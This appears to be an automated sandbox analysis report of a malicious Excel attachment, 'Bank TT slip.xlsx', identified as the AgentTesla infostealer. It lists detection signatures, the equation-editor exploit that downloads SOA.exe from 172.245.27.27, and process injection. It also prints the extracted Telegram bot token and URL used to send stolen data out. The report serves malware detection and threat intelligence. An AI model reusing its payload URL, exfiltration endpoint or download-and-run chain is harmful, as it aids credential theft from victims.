Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name: Bank TT slip.xlsx
Analysis ID: 626166
MD5: 2391e6aa319cba9248661674ac5f2105
SHA1: bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256: 18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: 5.0.RegSvcs.exe.400000.4.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
Source: Bank TT slip.xlsx Metadefender: Detection: 20% Perma Link
Source: Bank TT slip.xlsx ReversingLabs: Detection: 31%
Source: http://172.245.27.27/SOA.exe Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC: Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe Joe Sandbox ML: detected
Source: 5.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 172.245.27.27 Port: 80 Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680658 ShellExecuteExW,ExitProcess, 2_2_03680658
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680592
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036804ED ExitProcess, 2_2_036804ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680676 ExitProcess, 2_2_03680676
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680641 ShellExecuteExW,ExitProcess, 2_2_03680641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680522
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680506
Source: global traffic DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB

Networking

barindex
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 172.245.27.27 172.245.27.27
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:58:18 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28Last-Modified: Thu, 12 May 2022 04:27:00 GMTETag: "cb600-5dec8f8138359"Accept-Ranges: bytesContent-Length: 833024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00 00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00 00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 80 08 00 dc 3f 04 00 03 00 00 00 86 03 00 06 e8 66 01 00 08 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 23 00 00 0a 2a 26 00 02 28 24 00 00 0a 00 2a ce 73 25 00 00 0a 80 01 00 00 04 73 26 00 00 0a 80 02 00 00 04 73 27 00 00 0a 80 03 00 00 04 73 28 00 00 0a 80 04 00 00 04 73 29 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 31 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 32 00 00 0a 00 2a 6a 02 02 7b 07 00 00 04 28 02 00 00 2b 7d 07 00 00 04 02 7b 07 00 00 04 2b 00 2a 6a 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 2b 00 2a 6a 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 2b 00 2a 6a 02 02 7b 0a 00 00 04 28 05 00 00 2b 7d 0a 00 00 04 02 7b 0a 00 00 04 2b 00 2a 6a 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 6a 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 6a 02 02 7b 0d 00 00 04 28 08 00 00 2b 7d 0d 00 00 04 02 7b 0d 00 00 04 2b 00 2a 6a 0
Source: global traffic HTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png Jump to behavior
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: global traffic HTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior

System Summary

barindex
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: 5.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB070 4_2_002EB070
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA8F8 4_2_002EA8F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9910 4_2_002E9910
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC970 4_2_002EC970
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF14E 4_2_002EF14E
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBA80 4_2_002EBA80
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5440 4_2_002E5440
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8740 4_2_002E8740
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED808 4_2_002ED808
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC959 4_2_002EC959
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF222 4_2_002EF222
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A04 4_2_002E9A04
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA69 4_2_002EEA69
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA78 4_2_002EEA78
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9AB3 4_2_002E9AB3
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A98 4_2_002E9A98
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE420 4_2_002EE420
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5430 4_2_002E5430
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE410 4_2_002EE410
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECA2 4_2_002EECA2
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECB0 4_2_002EECB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF4A 4_2_002EEF4A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF58 4_2_002EEF58
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED7F9 4_2_002ED7F9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C64DF 4_2_007C64DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C8DDD 4_2_007C8DDD
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3EF0 4_2_007C3EF0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C43BF 4_2_007C43BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C0048 4_2_007C0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3010 4_2_007C3010
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D78 4_2_007C6D78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D79 4_2_007C4D79
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6134 4_2_007C6134
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D91 4_2_007C6D91
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D88 4_2_007C4D88
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6E1A 4_2_007C6E1A
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3610 4_2_007C3610
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6B78 4_2_007C6B78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6771 4_2_007C6771
